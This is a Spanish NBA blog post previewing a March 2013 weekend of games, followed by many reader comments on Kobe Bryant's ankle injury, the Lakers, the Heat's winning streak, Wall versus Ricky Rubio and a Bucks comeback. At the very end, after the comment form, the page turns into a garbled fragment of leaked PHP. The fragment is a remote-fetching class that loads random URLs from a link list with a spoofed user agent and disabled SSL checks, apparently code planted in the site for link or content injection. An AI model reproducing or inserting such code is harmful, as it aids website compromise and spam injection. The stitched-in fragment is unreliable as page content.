Fin de semana: a exprimir el cambio de hora

15 de March de 2013 por MagicJohnson32

Estamos en uno de mis días favoritos del año, ésos en los que los partidos de la NBA empiezan ‘una hora antes’. Hasta el sábado 31 no tenemos que adaptar nuestros relojes al horario de verano, cosa que ya hicieron en Estados Unidos hace una semana, con lo cual los horarios no volverán a la normalidad hasta dentro de quince días. Aprovechemos, pues, lo que nos queda, que no es poco.

Los alicientes del fin de semana que se nos presenta por delante son abundantes: la racha de victorias de los Heat, que puede alcanzar las 22 este fin de semana; la presencia o no de Kobe Bryant y cómo reaccionarían los Lakers a su ausencia; los imparables Grizzlies, que si no fuesen los Grizzlies los contaríamos entre los candidatos a la primera plaza; otro apasionante capítulo en la lucha por los Playoffs del Oeste, incluyendo un Warriors-Rockets…

Por partes:

VIERNES

  • 0h00: a la medianoche arrancan tres partidos. Bobcats @ Raptors, Hornets @ Wizards y el mucho más interesante Lakers @ Pacers. En el momento en que se están escribiendo estas líneas, no se descarta la participación de Kobe, pese a la gravedad de la torcedura de tobillo que se produjo contra los Hawks. Sería casi un milagro, pero no sería la primera vez que juega lesionado. Si no puede, saldrá Meeks de inicio. En cualquier caso, los Pacers parten como claros favoritos.
  • 0h30: con Jermaine O’Neal de inicio en detrimento de Scola, los Suns visitan a Atlanta Hawks, que parece que recuperarán a Josh Smith y Jeff Teague para un compromiso teóricamente sencillo.
  • 1h00: pocas esperanzas les damos tanto a los Magic como a los Wolves en sus respectivas visitas a Oklahoma City y Houston. La posible ausencia de James Harden, duda por las molestias de tobillo que arrastra, complicaría las cosas a los Rockets.
  • lebron bucks1h30: la última vez que Bucks y Heat se enfrentaron, los campeones salieron trasquilados. Pero eso fue a finales del año pasado y no había ninguna racha de 20 victorias en marcha. Los Bucks suman dos derrotas seguidas y la pista de los campeones no es lo más recomendable para cambiar una dinámica negativa. A la misma hora, Cavs y Mavs se enfrentan en Dallas.
  • 2h00: uno de los mejores partidos del viernes es el que se disputará en Denver entre Grizzlies y Nuggets, actualmente involucrados en la lucha por la tercera posición del Oeste. La capacidad de Chris Paul para controlar el tempo del juego y evitar que los Nuggets corran será una de las claves que determinarán la suerte del encuentro.
  • 3h30: aunque para ver dos estilos radicalmente opuestos frente a frente, el Bulls @ Warriors con el que acaba la jornada. Los de Chicago querrán redimirse tras la humillación sufrida en Sacramento, pero los de Oakland parecen recuperados y de nuevo dispuestos a asegurar su participación en los Playoffs.

SÁBADO

  • 0h00:Suns y Wizards, dos equipos sin motivación alguna por ganar partidos, abren fuego el sábado. Si Jermaine O’Neal aguanta un back-to-back como titular, entonces sí, los servicios médicos y de fisioterapia de los Suns ya habrán conseguido lo imposible.
  • 0h30: los Celtics tienen una ocasión inmejorable de vengar la dolorosa derrota de hace apenas unos días en Charlotte, donde fueron apalizados por el colista de la NBA. A la misma hora, los Pacers viajan a Philadelphia para hurgar en la profunda e irreparable herida de los Sixers.
  • 1h30: los Cavs aguantan con mucha dignidad la ausencia de Kyrie Irving, pero una visita al Alamo se presenta para Waiters y compañía, y más después de la última exhibición de Duncan.
  • 3h00: acaba la jornada del sábado con la visita de los Pistons a Portland y la de los Grizzlies a Salt Lake City.

DOMINGO

  • 18h00: no uno sino dos partidos arrancan a las 7 de la tarde este domingo, aunque ninguno del nivel que acostumbran a tener estos partidos tan tempraneros. En este caso son Orlando Magic @ Milwaukee Bucks y Miami Heat @ Toronto Raptors.
  • 20h30: el posible retorno de Carmelo Anthony se presenta como el principal aliciente del enfrentamiento entre Knicks y Clippers en el Staples. Sin Melo, no vemos cómo podrían los Knicks plantar cara a los locales, salvo que JR tenga un día especialmente bueno. Además, Chandler también es duda.
  • curry lin0h00: entre lo más destacado del domingo está el cuarto enfrentamiento entre Warriors y Rockets en poco más de un mes. Los tres precedentes se saldaron con victoria texana, cosa que, de repetirse, dejaría en un pañuelo la carrera entre ambos equipos por la sexta plaza. Y sólo el factor Ricky nos hará prestar atención al Hornets @ Wolves.
  • 0h30: un excelente Thunder @ Mavs, con el recuerdo todavía vivo de la barrida de los pasados Playoffs, es el único partido que se iniciará a esta hora.
  • 1h00: los Nets reciben en el Barclays Arena a los Hawks. Una victoria local aclararía el panorama de los de Brooklyn de cara a hacerse con la cuarta posición del Este.
  • 2h30: con o sin Kobe, no tienen excusa los Lakers ante la visita de los Kings en el encuentro que supondrá el broche al fin de semana.
Comenta

41 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Es alucinante. Kobe, titular esta noche.

      Citar

  2. rumbero dice:
    #2

    Es un animal. Si debe tener una pelota de tenis por tobillo ahora mismo. De momento ha fallado todo lo que ha tirado, pero Meeks tambien y anda algo mas sano 😀

      Citar

  3. Jose Luis dice:
    #3

    Bryant no jugó más allá del primer cuarto.

    Increíble e importantísima victoria de Lakers. Jugando sin Bryant y sin Pau, en la cancha de INDIANA. Se reponen de la absurda derrota con los Hawks. Una ofensiva bien movida en la mayor parte del encuentro, con varias pérdidas pero jugando un muy buen último cuarto. Balones a Howard y mucho movimiento buscando triples, varios pick & rolls donde Nash tiraba de 4 metros tras quedar libre en la pantalla, y partidazo de Steve Blake, mostrando que está a un gran nivel y que el sistema D’Antoni le viene como un guante. Jamison también muy bien ante un Clark que va perdiendo peso.

    Los Lakers se agarraron a Metta cuando los Pacers apretaron en el 3er cuarto, 11 puntos anotó el alero.

    Por cierto, Meeks no ha sumado ningún punto, más valor aún a la victoria de Lakers y al gran partido que han hecho el resto de jugadores. MWP 19 puntos, Howard 20, Nash 15, Jamison 17, Blake 18. Clark 8 y Sacre 2.

    Mal partido del frontcourt de los Pacers… 4-13 West, 3-12 Hibbert, 6-20 George, 1-5 Hansbrough…

      Citar

  4. rumbero dice:
    #4

    Coach Bryant con la pizarrita. Su tobillo no daba para mas pero le ha dado tiempo de transmitir sus conocimientos a Metta y su juego a Blake. Que partido

      Citar

  5. Simon dice:
    #5

    lo de bryant jugando hoy me parece muy estupido, como mínimo debería estar 15 días. Ya lo dije, Utah está muerto y el calendario Lakers en los próximos 10 dias no es nada del otro mundo, mas vale descansar y cuidar ese tobillo y no comprometer no ya su carrera, si no su carrera. Sinceramente no me parece heróico ni digno de alabar este tipo de apariciones, el cuerpo hay que respetarlo. Si Kobe no cura bien este esguince ahora ( en verano ya no vale ) ya nunca volverá a ser el mismo.

      Citar

  6. Ruxixón dice:
    #6

    Simon:
    lo de bryant jugando hoy me parece muy estupido, como mínimo debería estar 15 días. Ya lo dije, Utah está muerto y el calendario Lakers en los próximos 10 dias no es nada del otro mundo, mas vale descansar y cuidar ese tobillo y no comprometer no ya su carrera, si no su carrera. Sinceramente no me parece heróico ni digno de alabar este tipo de apariciones, el cuerpo hay que respetarlo. Si Kobe no cura bien este esguince ahora ( en verano ya no vale ) ya nunca volverá a ser el mismo.

    Un riesgo innecesario porque en cualquier apoyo tras un salto o en cualquier percance te puedes volver a torcer tobillo y agravar la lesión.Está bien que sea “la leyenda Kobe” pero de vez en cuando hay que tener un poco de cabeza.

    El partido de los Pacers horrible,se vio una cantidad de fallos en sus jugadores impropia de esta liga.Hibbert…en verano lo traspasaba,a ver si alguien pica,porque madre mía,que indolencia.

      Citar

  7. rumbero dice:
    #7

    Totalmente, pero es que siempre le ha gustado ese punto de heroica/dramatismo. Soy Kobe y aquí estoy. Pero vaya, que viendo la foto de como tenía el tobillo me parece increible (y un gran riesgo) que se atreviera a jugar un cuarto. Por otro lado importantísima victoria de Lakers. Gran partido colectivo ante la ausencia del líder con mención especial para el tremendo partido Blake. Los Pacers al contrario se agarraron al buen partido de Hill y al rebote ofensivo porque el resto estuvieron realmente mal.

    Miami sigue dando una sensación de superiodad insultante. Big three a pleno rendimiento y el resto siempre preparados para meter las que les llegan. James acapara todos los focos, ayer otro partidazo y dejando alguna de las suyas como un mate de reverso en la cara de Henson. Pero es que Wade está a su mejor nivel y eso son palabras mayores. 12 partidos metiendo al menos 20 puntos y haciendo de todo y bien. Más Bosh que siempre suele estar. Parece muy difícil que alguien pueda tumbarlos a día de hoy.

    Del resto Denver que suma ya 11 victorias seguidas ganando a un rival directo como Memphis y que se mete de lleno en la pelea por la 3º plaza. Ojo con ellos si encima consiguen ventaja de campo porque llegan enchufadísimos. Y mientras los Bobcats metian 10 puntos en el último cuarto para perder contra Raptors los Rockets remontaban 20 de desvantaja en la media parte con festival ofensivo en la segunda. Es para verlo. A ver como se mueven este verano porque pueden construir un equipo realmente interesante.

      Citar

  8. Esteban dice:
    #8

    howard esta volviendo a ser howard, en todo sentido, defnesa, intimidacion, REBOTES y putnos y alli esta la majora en el rendimiento de los lakers, no en kobe y en los demas, sino gracias a howard

    empieza a atraer dobles marcas y sus tirados se llenan de triples, esta bajando 20 rebotes por noche y ha recuperado explosividad en ofensiva

    es parecido al howard de orlando, y con eso, los lakers son otro equipo,

      Citar

  9. Ekos dice:
    #9

    Wall es buenísimo.

      Citar

  10. melo15 dice:
    #10

    Coincido contigo, para mi es mucho mejor que otros bases de la liga.
    Fisicicamente es espectacular y ademas tiene una vision tambien muy buena.
    El año pasado se dudaba de el diciendo que bases como Ricky o otros eran mejores y es totalmente falso y si no que la gente se fije como se ha recuperdo uno y como lo ha hecho el otro

      Citar

  11. melo15 dice:
    #11

    Por cierto, muy preocupado con mis Knicks. No solo por los resultados si no porque parece que el equipo no da mas de si.
    Kidd y Felton han dado un bajon tremendo, Melo con las lesiones tambien. Ademas el equipo ya no defiende como antes y juegan demasiadas isolations que no nos llevan a nada.
    El equipo ha de reaccionar ya y mantener la tercera plaza como sea.
    PD: Alguien sabe si Stat estara para los PO.

      Citar

  12. Jose Luis dice:
    #12

    Kidd empezó a un nivel muy alto, que no era el suyo ni de coña. Los tripleros igual, mucho porcentaje en las primeras semanas que se sabía no podían mantener. Más un esfuerzo porque parecían poder quedar líderes, les hizo subir su nivel.

    Además (cosas de empezar nueva temporada y tal, con ilusion) jugaron mas en equipo y defendieron mejor, cosa que se ha ido perdiendo conforme avanzaba la temporada.

    Para mí, si caen en 1ª ronda, no es sorpresa.

      Citar

  13. MagicJohnson32 dice:
    #13

    melo15:
    El año pasado se dudaba de el diciendo que bases como Ricky o otros eran mejores y es totalmente falso y si no que la gente se fije como se ha recuperdo uno y como lo ha hecho el otro

    ¿Qué quieres decir? No acabo de entender tu razonamiento.

    Y sí, en teoría Stoudemire estará recuperado para Playoffs.

      Citar

  14. MagicJohnson32 dice:
    #14

    Hombre, los Knicks están sin Melo, STAT y Chandler, no sé qué queréis…

      Citar

  15. melo15 dice:
    #15

    Pues quiero decir que a Wall este ultimo año se le ha crticado bastante.
    Como estaba en un grupo lleno de jugadores sin compromiso y que pasaban (McGee, Blachte, Young) a el se le puso en el mismo saco y a final de año se acabo diciendo que si era mejor traspasarlo y que no servia como jugador franquicia.
    Pero yo creo que este año ha demostrado que es un verdadero lider y si no mirar el record del equipo con y sin Wall, alucinante.

      Citar

  16. melo15 dice:
    #16

    No creo que los aficionados de los Knicks se quejen del equipo que tienen, pero hasta ahora el unico que mantiene el nivel es Chandler, porque Carmelo esta teniendo lesiones que les estan perjudicando y Stat va I vuelve de las lesiones.
    Con el equipo completo los Knicks son candidatos a Final de Conferencia 100%

      Citar

  17. rumbero dice:
    #17

    MagicJohnson32:
    Y sí, en teoría Stoudemire estará recuperado para Playoffs.

    Si? Yo había leido por ahí que le van a hacer otra artroscopia en la rodilla y va a estar entre 6 y 8 semana fuera. Teniendo en cuenta que los PO empiezan en un mes se perdería 1º ronda mínimo.

    Wall y Ricky se estan recuperado muy bien sus respectivas lesiones, poco se puede decir respecto a eso. Yo creo que a Wall le han dado toda la confianza desde la franquicia para ser el líder del equipo y a mi me parece un acierto. De esa (bendita) locura de equipo que eran los Wall-Young-Crawford-Blatche-McGee sólo queda él. El único pero que le pongo siempre es ese tiro de larga distancia que no tiene. Si desarrolara uno medio decente sería terrible para los defensas que no podrian estar tan atentos a sus entradas a canastas con esa explosividad que tiene. La pareja que puede formar con Beal promete y deberian pelear por PO la temporada que viene viendo su nivel ahora mismo.

      Citar

  18. Ekos dice:
    #18

    melo15:
    Pues quiero decir que a Wall este ultimo año se le ha crticado bastante.
    Como estaba en un grupo lleno de jugadores sin compromiso y que pasaban (McGee, Blachte, Young) a el se le puso en el mismo saco y a final de año se acabo diciendo que si era mejor traspasarlo y que no servia como jugador franquicia.
    Pero yo creo que este año ha demostrado que es un verdadero lider y si no mirar el record del equipo con y sin Wall, alucinante.

    Sí, y se le ha criticado injustamente creo yo… Es ampliamente superior a Ricky, su visión de juego no es muy inferior a la del español, y en el resto de los aspectos le supera ampliamente, junto con Beal, los Wizards tendrán para los años venideros uno de los mejores backcourts de toda la liga.

      Citar

  19. Ekos dice:
    #19

    He leído además que los promedios de la última semana de Wall son de 24-11 con un 62% de acierto en tiros de campo, espectacular.

      Citar

  20. MagicJohnson32 dice:
    #20

    melo15:
    Pues quiero decir que a Wall este ultimo año se le ha crticado bastante.
    Como estaba en un grupo lleno de jugadores sin compromiso y que pasaban (McGee, Blachte, Young) a el se le puso en el mismo saco y a final de año se acabo diciendo que si era mejor traspasarlo y que no servia como jugador franquicia.
    Pero yo creo que este año ha demostrado que es un verdadero lider y si no mirar el record del equipo con y sin Wall, alucinante.

    Sí, sin duda. En varias crónicas lo he dicho, que el regreso de Wall ha convertido a los Wizards en un equipo serio por primera vez en mucho tiempo (también tiene que ver la llegada de Nene). ¿Pero qué tiene que ver eso con Ricky? ¿Tú has visto la plantilla que rodea a Ricky? Lo que consigue Rubio es un milagro. Sin Love, ni Pekovic, ni Roy, ni Budinger, ni Kirilenko.
    Para alabar a uno no hace falta criticar al otro y el nivel de Wall y Ricky está siendo extraordinario, sólo que las circunstancias que rodean a Rubio son peores.

      Citar

  21. Nacho dice:
    #21

    La plantilla que rodea a Ricky a día de hoy, pelearía por entrar en PO de la ACB.

      Citar

  22. Denise dice:
    #22

    ¿Alguien viendo el Orlando-Milwaukke ademas de yo? Falta un cuarto, de momento Orlando gana cómodamente de 11. Tremendo partido del rookie Harless, mientras que por los Bucks el trío Jennings-Ellis-Redick están tirando mandarinas al son de Bilmaaaaa!!!!!!

      Citar

  23. MagicJohnson32 dice:
    #23

    Denise:
    ¿Alguien viendo el Orlando-Milwaukke ademas de yo? Falta un cuarto, de momento Orlando ganacómodamente de 11. Tremendo partido del rookie Harless, mientras que por los Bucks el trío Jennings-Ellis-Redick están tirando mandarinas al son de Bilmaaaaa!!!!!!

    Sí, lo estoy viendo (voy cambiando al Heat-Raps), y muy bien Harkless y Vucevic. Bueno, y Afflalo, y Tobias los ratos que ha podido jugar. Gran partido de los Magic hasta el momento. Hoy la defensa en transición de los Bucks parece la de los Lakers, jeje.

      Citar

  24. Denise dice:
    #24

    Pues iban 12 arriba comodamente, y Monta Ellis que estaba desaparecido acaba de enchufar 2 triples en 30 segundos que ha puesto a los Bucks a 6, teniendo Vaughn lógicamente que pedir el tiempo muerto. Va a estar interesante el final.

      Citar

  25. Denise dice:
    #25

    Y otro más de Ellis, pfff 3 triples consecutivos

      Citar

  26. Denise dice:
    #26

    Si mis cuentas no me fallan, Ellis que había estado tirando mandarinas los 3 primeros cuartos, ya lleva 20 puntos y 4 triples en el último cuarto, y quedan 3 minutos.

      Citar

  27. MagicJohnson32 dice:
    #27

    He cambiado un rato al Raps-Heat, y cuando vuelvo veo que Monta lleva 34 puntos. ¿Qué ha pasado ahí? xD

      Citar

  28. MagicJohnson32 dice:
    #28

    Denise:
    Si mis cuentas no me fallan, Ellis que había estado tirando mandarinas los 3 primeros cuartos, ya lleva 20 puntos y 4 triples en el último cuarto, y quedan 3 minutos.

    Ah, eso ha pasado, ya decía yo…

      Citar

  29. Denise dice:
    #29

    MagicJohnson32: Ah, eso ha pasado, ya decía yo…

    Creo que el enlace por el que lo estoy viendo va con algo de retraso, porque antes he mirado el box-score en nba.com y el marcador iba mas cavanzado que lo que estoy viendo.

      Citar

  30. Denise dice:
    #30

    Van a ganar los Bucks, pero que arbitraje mas casero, macho.

      Citar

  31. MagicJohnson32 dice:
    #31

    Pues sí, 25 de Monta en el último cuarto y remontada de los Bucks. Injusta derrota probablemente para los Magic, pero Denise, piensa que cada derrota significa mejores perspectivas de cara al draft.

      Citar

  32. Denise dice:
    #32

    MagicJohnson32:
    Pues sí, 25 de Monta en el último cuarto y remontada de los Bucks. Injusta derrota probablemente para los Magic, pero Denise, piensa que cada derrota significa mejores perspectivas de cara al draft.

    Si, con 5 ó 6 triples. Los Bucks estaban muertos, yendo a remolque todo el partido, siempre por debajo unos 8-10 puntos, en el último cuarto a Monta le ha entrado la inspiración y a base de triples ha propiciado la victoria de MIlwaukee por 6 puntos (115-109) con un parcial del último cuarto de 45-28.

    La derrota es lo de menos, lo importante son las sensaciones, y estos Magic tienen pinta de poder dar guerra en los proximos años con esta base más un par de jugadores franquicias. El partido de hoy lo pierden, precisamente por eso, por la ausencia de un jugador franquicia que no le queme el balón en la mano al final, eso y algunas decisiones arbitrales como la expulsión de Tobias Harris por una inexistente falta en ataque, un 2+1 riguroso, la sanciión a los Magic en el saque de banda, en fin..

      Citar

  33. rumbero dice:
    #33

    Miami ha pasado por encima de Toronto. Son una máquina de jugar a baloncesto ahora mismo, me ha dado la impresión que el partido era exactamente el mismo que el viernes pero cambiando a Raptors por Bucks.

      Citar

  34. Denise dice:
    #34

    rumbero:
    Miami ha pasado por encima de Toronto. Son una máquina de jugar a baloncesto ahora mismo, me ha dado la impresión que el partido era exactamente el mismo que el viernes pero cambiando a Raptors por Bucks.

    Llamadme loco pero los unicos a dia de hoy que veo capaces de arrebatarle el anillo a Miami son los Lakers, si éstos consiguen llegar con Kobe, Pau y Howard al 100%. Le metemos mucha caña a los angelinos, pero realmente continuan ahí con la cantidad de lesiones importantes que han tenido todo el año, si los 4 fantasticos consiguen jugar a pleno rendimiento 10-15 partidos seguidos, podríamos ver el nivel que al que pueden llegar.

    Por el modo de jugar de Miami, veo mas factible que pudieran perder una serie contra Denver ó Memphis, antes que con los gallitos Spurs, Thunder y Clippers.

      Citar

  35. nba dice:
    #35

    Tendría gracia ahora que se acerca el final de la regular y con su big-four tocado fisicamente lque os Lakers empezasen a ganar partidos de manera continua, bastante tendran con afianzarse en la 8 plaza, y despues rezar para que no les toque enfrentarse a OKC

      Citar

  36. Jose Luis dice:
    #36

    Joder como juega Blake en el sistema de D’Antoni… y jugando de 2 la mayor parte del tiempo. Acojonante.

      Citar

  37. rumbero dice:
    #37

    Denise: Llamadme loco pero los unicos a dia de hoy que veo capaces de arrebatarle el anillo a Miami son los Lakers, si éstos consiguen llegar con Kobe, Pau y Howard al 100%. Le metemos mucha caña a los angelinos, pero realmente continuan ahí con la cantidad de lesiones importantes que han tenido todo el año, si los 4 fantasticos consiguen jugar a pleno rendimiento 10-15 partidos seguidos, podríamos ver el nivel que al que pueden llegar.

    Por el modo de jugar de Miami, veo mas factible que pudieran perder una serie contra Denver ó Memphis, antes que con los gallitos Spurs, Thunder y Clippers.

    Yo no me atrevo a tanto, pero si es cierto que si alguien quiere ganarle una serie a Miami parece que tendrá que ser que ser a base de juego interior y trabar o ensuciar los partidos porque en todo lo demás son mejores y en un cara a cara contra ellos llevas las de perder. Y lo peor es que parece que van sobrados y que aprietan cuando lo necesitan.

      Citar

  38. Simon dice:
    #38

    Yo estoy con Denise, a día de hoy solo veo a los Lakers capaces de hacerle cara a Miami. Pero no tengo claro si es por las ultimas sensaciones ( Howard ha mejorado mucho y Jamison y Blake están aportando ) o simplemente porque aun me dejo obnubilar por sus nombres y eso no me deja ver del todo que el equipo no ha funcionado en todo el año. El caso es que si Lakers consigue evitar a OKC en su parte del cuadro de PO y consiguen pasar la primera ronda, esa confianza les puede disparar hacia las finales de la NBA a nada que Gasol vuelva y se integre bien en el equipo.

      Citar

  39. Simon dice:
    #39

    rumbero: Yo no me atrevo a tanto, pero si es cierto que si alguien quiere ganarle una serie a Miami parece que tendrá que ser que ser a base de juego interior y trabar o ensuciar los partidos porque en todo lo demás son mejores y en un cara a cara contra ellos llevas las de perder. Y lo peor es que parece que van sobrados y que aprietan cuando lo necesitan.

    Es que es eso, no he visto ningun partido de Miami en el que diga: “lo han dado todo”. Sin embargo siempre que los he visto me queda una sensacion de no han apretado todo lo que pueden y que todavía le quedan dos marchas mas. No me mola que vayan tan sobrados pues no veo quien a corto plazo podría plantarles cara en la liga. OKC no creo que alcance su nivel nunca ( pues no van a gastar dinero para completar su plantilla ), Spurs y Lakers se acaban, Clippers no convence realmente como alternativa, y los demás están tan lejos de Miami que ni en 3 años recortarían la diferencia de nivel

      Citar

  40. Denise dice:
    #40

    Creo que a Miami sólo hay 2 formas de ganarles:

    – Machacandolos por dentro: Sólo los Lakers con la dupla Pau-Howard más la aportación de Jamison y Clark pueden hacerlo. Los Knicks también tendrían una buena opción porque su batería de pivots suena aconojante, lo peor es que casi todos están de vuelta. Si mantuvieran un nivel óptimo, tendrían sus opciones.

    – A base de defensa: Hay Lakers no tienen nada que hacer, pero si otros equipos con buenos defensores ó con una rotación larga como Denver ó Memphis.

      Citar

  41. Denise dice:
    #41

    Denise: Hay Lakers .

    Vaya patada al diccionario he dado.
    Una propuesta, Txusma, si el blog os funciona bien y eso..poned un botón de editar el comentario 🙂

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>